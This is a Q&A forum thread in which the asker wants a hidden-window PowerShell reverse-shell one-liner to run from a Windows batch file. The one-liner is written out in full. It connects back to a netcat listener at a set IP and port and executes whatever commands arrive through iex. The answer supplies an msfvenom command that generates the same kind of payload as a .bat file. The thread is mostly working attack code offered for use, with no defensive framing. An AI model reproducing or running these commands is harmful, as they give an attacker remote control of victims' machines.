Execute PowerShell as batch file

Question

I'm trying to run the below reverse shell PowerShell command using a .bat file.

powershell /w 1 "$c=new-object system.net.sockets.tcpclient('192.168.0.66',4777);$s=$c.GetStream();[byte[]]$b = 0..65535|%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){;$d = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0,$i);$o=(iex $d 2>&1|out-string);$z=$o + 'hacker> ' + (pwd).Path + '> ';$x = ([text.encoding]::ASCII).GetBytes($z);$s.Write($x,0,$x.Length);$s.Flush};$c.close()"

First, I start the netcat listener in Kali:

nc -vv -l -p 4777

I then run the PowerShell command, but I get the following error in Windows 10:

    At line:1 char:112
    + ... 168.0.66',4777);$s=$c.GetStream();[byte[]]$b = 0..65535|:ASCII).GetByte ...
    +                                                                 ~
    Unexpected token ')' in expression or statement.
    At line:1 char:160
    + ... 65535|:ASCII).GetBytes($z);$s.Write($x,0,$x.Length);$s.Flush};$c.clos ...
    +                                                                 ~
    Unexpected token '}' in expression or statement.
        + CategoryInfo          : ParserError: (:) [], ParentContainsErrorRecordException
        + FullyQualifiedErrorId : UnexpectedToken

I've tried many possible ' , " and ``` combinations and variations , both in and encasing the command. I'm totally stumped.

Answer 1

Found myself into the same problem. I wonder why a command that runs without errors in CMD doesn't work well if it's executed inside a .bat file. I doesn't make sense at all.

Metasploit is our friend here:

msfvenom -p cmd/windows/reverse_powershell lhost=192.168.1.109 lport=4444 > 1.bat

Source: https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/